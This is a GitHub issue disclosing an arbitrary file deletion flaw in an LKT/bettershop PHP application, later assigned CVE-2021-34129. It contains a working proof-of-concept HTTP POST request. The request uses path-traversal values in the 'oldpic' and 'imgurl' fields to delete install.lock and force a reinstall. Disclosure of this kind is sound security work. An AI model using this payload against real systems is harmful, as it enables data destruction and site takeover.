Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Arbitrary file deletion leads to system reinstallation vulnerabilities #9

Open
sviivyao opened this issue Jun 1, 2021 · 1 comment
Open

Arbitrary file deletion leads to system reinstallation vulnerabilities #9

sviivyao opened this issue Jun 1, 2021 · 1 comment

Comments

@sviivyao
Copy link

sviivyao commented Jun 1, 2021

When the system is successfully installed, the system will generate the install.lock file in the /data/ directory. When the user wants to reinstall, it will first determine whether the install.lock file exists. If it exists, the installation cannot be repeated, but we can find one To delete any file, delete the install.lock file, you can directly reinstall the system.
The parameters $uploadImg, $oldpic, and $imgurl are all controllable:
image
Vulnerability recurrence: first log in to the background to access the link :
http://your domain /open/app/LKT//index.php?module=Article,and then
publish an article.
image
Then modify the article:
image
Before proceeding with any file deletion, visit the install directory:
image
Replace parameters and delete any files:
image
image
Visit the install directory again and find that arbitrary file deletion has been implemented, which leads to reinstallation vulnerabilities.
image

POST /open/app/LKT//index.php?module=Article&action=modify HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------344640124212804469902957501276
Content-Length: 1265
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/open/app/LKT//index.php?module=Article&action=modify&id=2&uploadImg=../LKT/images/
Cookie: bdshare_firstime=1609743336438; ECS[visit_times]=4; admin_mojavi=79kjqjkl1ntgk4q7se7maqtdcl
Upgrade-Insecure-Requests: 1

-----------------------------344640124212804469902957501276
Content-Disposition: form-data; name="id"

2
-----------------------------344640124212804469902957501276
Content-Disposition: form-data; name="editable"

true
-----------------------------344640124212804469902957501276
Content-Disposition: form-data; name="uploadImg"

../../
-----------------------------344640124212804469902957501276
Content-Disposition: form-data; name="Article_title"

222
-----------------------------344640124212804469902957501276
Content-Disposition: form-data; name="Article_prompt"

111
-----------------------------344640124212804469902957501276
Content-Disposition: form-data; name="sort"

100
-----------------------------344640124212804469902957501276
Content-Disposition: form-data; name="imgurl"

../../111
-----------------------------344640124212804469902957501276
Content-Disposition: form-data; name="oldpic"

app/data/install.lock
-----------------------------344640124212804469902957501276
Content-Disposition: form-data; name="Submit"


-----------------------------344640124212804469902957501276
Content-Disposition: form-data; name="content"

<p>32333<br/></p>
-----------------------------344640124212804469902957501276--
@OS-WS
Copy link

OS-WS commented Jun 22, 2021

Hi @bettershop @sviivyao
This issue was assigned with CVE-2021-34129.
Was it fixed?

Thanks!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@OS-WS @sviivyao